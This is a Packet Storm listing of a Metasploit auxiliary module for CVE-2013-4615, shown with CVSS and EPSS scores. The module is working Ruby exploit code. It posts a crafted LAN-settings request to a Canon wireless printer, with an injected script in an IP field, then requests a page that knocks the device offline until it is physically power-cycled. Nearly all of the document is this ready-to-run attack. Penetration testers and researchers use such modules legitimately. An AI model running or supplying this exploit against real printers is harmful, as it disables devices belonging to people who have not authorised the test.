Lucene search

K
packetstormMatt hostess Andreko, metasploit.comPACKETSTORM:180511
HistoryAug 31, 2024 - 12:00 a.m.

Canon Wireless Printer Denial Of Service

2024-08-3100:00:00
Matt hostess Andreko, metasploit.com
packetstormsecurity.com
14
wireless printer
denial of service
http
crafted request
cve-2013-4615

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

AI Score

7

Confidence

Low

EPSS

0.335

Percentile

97.1%

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Canon Wireless Printer Denial Of Service',  
'Description' => %q{  
The HTTP management interface on several models of Canon Wireless printers  
allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:  
if this module is successful, the device can only be recovered with a physical  
power cycle.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Matt "hostess" Andreko <mandreko[at]accuvant.com>'  
],  
'References' => [  
[ 'CVE', '2013-4615' ],  
[ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']  
],  
'DisclosureDate' => '2013-06-18'))  
end  
  
def is_alive?  
res = send_request_raw({  
'method' => 'GET',  
'uri' => '/',  
},10)  
  
return !res.nil?  
end  
  
def run  
  
begin  
  
# The first request will set the new IP  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => '/English/pages_MacUS/cgi_lan.cgi',  
'data' => 'OK.x=61' +  
'&OK.y=12' +  
'&LAN_OPT1=2' +  
'&LAN_TXT1=Wireless' +  
'&LAN_OPT3=1' +  
'&LAN_TXT21=192' +  
'&LAN_TXT22=168' +  
'&LAN_TXT23=1' +  
'&LAN_TXT24=114"><script>alert(\'xss\');</script>' +  
'&LAN_TXT31=255' +  
'&LAN_TXT32=255' +  
'&LAN_TXT33=255' +  
'&LAN_TXT34=0' +  
'&LAN_TXT41=192' +  
'&LAN_TXT42=168' +  
'&LAN_TXT43=1' +  
'&LAN_TXT44=1' +  
'&LAN_OPT2=4' +  
'&LAN_OPT4=1' +  
'&LAN_HID1=1'  
})  
  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE  
print_error("Couldn't connect to #{rhost}:#{rport}")  
return  
end  
  
# The second request will load the network options page, which seems to trigger the DoS  
send_request_cgi({  
'method' => 'GET',  
'uri' => '/English/pages_MacUS/lan_set_content.html'  
},5) #default timeout, we don't care about the response  
  
# Check to see if it worked or not  
if is_alive?  
print_error("#{rhost}:#{rport} - Server is still alive")  
else  
print_good("#{rhost}:#{rport} - Connection Refused: Success!")  
end  
  
end  
end  
`

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

AI Score

7

Confidence

Low

EPSS

0.335

Percentile

97.1%